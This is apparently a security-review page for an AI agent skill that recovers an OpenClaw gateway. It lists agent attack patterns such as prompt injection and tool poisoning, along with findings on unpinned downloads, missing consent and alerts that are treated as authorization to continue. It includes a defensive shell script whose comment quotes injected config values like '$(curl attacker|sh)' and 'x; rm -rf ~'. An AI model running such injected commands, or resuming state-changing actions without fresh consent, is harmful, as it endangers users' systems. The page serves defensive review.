Gateway Guardian

Security checks across malware telemetry and agentic risk

Overview

Gateway Guardian appears purpose-built for OpenClaw gateway recovery, but it installs persistent services, and its installation and notification behavior is under-scoped in ways users should review carefully.

Install it only if you intentionally want a background guardian that can modify OpenClaw config, restart the gateway, and send operational notifications. Prefer a version that uses the packaged, reviewed scripts or pinned, checksummed downloads; that validates or safely quotes guardian.conf values; and that asks for explicit confirmation before making persistent systemd changes. Review recovery alerts before forwarding them, because they may contain logs or operational details.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (5)

Description-Behavior Mismatch

Medium severity, 93% confidence
Finding
The skill instructs the agent to fetch executable files directly from a live GitHub branch and install them into the local skills directory without pinning a commit, verifying checksums, or validating signatures. That creates a software supply-chain risk: the repository contents can change after review, allowing arbitrary code execution during installation.

Vague Triggers

Medium severity, 88% confidence
Finding
The trigger set includes generic phrases like 'install this skill' and multilingual variants that may match ordinary conversation and cause unintended activation. In this skill, accidental activation is more dangerous because activation leads to package installation, file downloads, config writes, and systemd persistence changes.

Missing User Warnings

Medium severity, 95% confidence
Finding
The instructions direct the agent to install packages, download code, write configuration files, and modify systemd user services, but they do not require a clear, upfront warning and explicit consent for those persistent system changes. This increases the risk of users authorizing actions without understanding that the skill creates background services and alters service failure behavior.
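The Overview, the Description-Behavior Mismatch finding, and the Missing User Warnings finding all point at the same three fixes: fetch install scripts from a pinned commit and verify a checksum, treat guardian.conf as data instead of sourcing it, and refuse persistent systemd changes without explicit consent. The script below is an added example written for this page; it is not code from the Gateway Guardian skill or from OpenClaw. The commit hash, the config keys GATEWAY_PORT, CHECK_INTERVAL, NOTIFY_CHANNEL and LOG_DIR, the unit name guardian.service, and the opt-in variable GUARDIAN_CONFIRM_PERSIST are all assumed names for illustration. fetch_pinned needs network access; the other functions run offline on constructed input.

```shell
#!/bin/sh
# Added example, not the skill's own installer. All names below are
# hypothetical: PINNED_COMMIT, the guardian.conf keys, the unit name and
# the GUARDIAN_CONFIRM_PERSIST opt-in are assumptions for illustration.
set -u

# A raw URL at a commit hash cannot change after review; a branch URL
# such as .../main/install.sh can. Hypothetical hash.
PINNED_COMMIT=0123456789abcdef0123456789abcdef01234567

# Compare a downloaded file's SHA-256 with the digest recorded at review
# time. On mismatch the file is deleted so no later step can execute it.
verify_sha256() {
  file=$1; expected=$2
  actual=$(sha256sum "$file" | cut -d' ' -f1)
  if [ "$actual" != "$expected" ]; then
    echo "checksum mismatch for $file" >&2
    rm -f "$file"
    return 1
  fi
  return 0
}

# Fetch a script from the pinned commit and keep it only if the checksum
# matches. Usage: fetch_pinned <owner/repo> <path> <dest> <sha256>
fetch_pinned() {
  repo=$1; path=$2; dest=$3; expected=$4
  curl -fsSL "https://raw.githubusercontent.com/$repo/$PINNED_COMMIT/$path" \
    -o "$dest" || return 1
  verify_sha256 "$dest" "$expected"
}

# Accept a config value only if it uses a conservative character set, so
# `$(curl attacker|sh)` or `x; rm -rf ~` can never be expanded, even if a
# later step quotes the value badly. Empty values are rejected too.
valid_conf_value() {
  case $1 in
    ''|*[!A-Za-z0-9._/:@-]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Read guardian.conf as data instead of `source`-ing it. Only known keys
# with valid values are printed as KEY=VALUE lines. Returns 1 if any line
# was rejected, so the caller can stop before writing anything.
load_guardian_conf() {
  conf=$1; rc=0
  while IFS= read -r line || [ -n "$line" ]; do
    case $line in
      ''|'#'*) continue ;;
      *=*) ;;
      *) echo "reject malformed line: $line" >&2; rc=1; continue ;;
    esac
    key=${line%%=*}; value=${line#*=}
    case $key in
      GATEWAY_PORT|CHECK_INTERVAL|NOTIFY_CHANNEL|LOG_DIR) ;;
      *) echo "reject unknown key: $key" >&2; rc=1; continue ;;
    esac
    if valid_conf_value "$value"; then
      printf '%s=%s\n' "$key" "$value"
    else
      echo "reject unsafe value for $key" >&2; rc=1
    fi
  done < "$conf"
  return $rc
}

# Persistent changes need explicit consent: either an answer on a terminal
# or GUARDIAN_CONFIRM_PERSIST=yes set deliberately by the operator. A
# non-interactive run without that opt-in is refused, never auto-approved.
confirm_persistent_change() {
  what=$1
  if [ "${GUARDIAN_CONFIRM_PERSIST:-}" = yes ]; then
    return 0
  fi
  if [ ! -t 0 ]; then
    echo "refusing to $what: no terminal and no explicit opt-in" >&2
    return 1
  fi
  printf 'About to %s. This persists across reboots. Continue? [y/N] ' "$what"
  read -r answer
  case $answer in
    y|Y) return 0 ;;
    *) return 1 ;;
  esac
}

# Write a systemd user unit only after confirmation. The unit directory is
# a parameter so a dry run can target a scratch directory instead of
# ~/.config/systemd/user. Enabling it (systemctl --user enable --now) is
# left to the operator as a separate, visible step.
install_user_unit() {
  unit_dir=$1; unit_name=$2; exec_start=$3
  confirm_persistent_change "install systemd user unit $unit_name" || return 1
  mkdir -p "$unit_dir"
  printf '[Unit]\nDescription=OpenClaw gateway guardian (example)\n\n[Service]\nExecStart=%s\nRestart=on-failure\n\n[Install]\nWantedBy=default.target\n' \
    "$exec_start" > "$unit_dir/$unit_name"
}
```

The key-allowlist plus character-class check is deliberately stricter than "quote the value": a value that never contains shell metacharacters stays safe even when some other script later does `eval` or `source` on the same file. The checksum is recorded at review time against the pinned commit, so a later push to the branch neither changes what is fetched nor passes verification.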

Ssd 1

Medium severity, 92% confidence
Finding
The notification text tells the AI to treat a forwarded system alert as sufficient context to continue automatically, which weakens the requirement for fresh user intent and contextual re-validation. In an agent environment, this can cause resumed actions after an interruption without confirming whether the user still wants the prior operation to continue or whether conditions have changed.

Ssd 1

Medium severity, 94% confidence
Finding
This section reinforces a semantic handoff pattern where forwarding a restart notice is treated as authorization for the agent to continue prior work. That is dangerous because a restart event does not reliably preserve user consent, task integrity, or environmental assumptions, especially for installation, configuration, or other state-changing operations.

VirusTotal

65/65 vendors flagged this skill as clean.
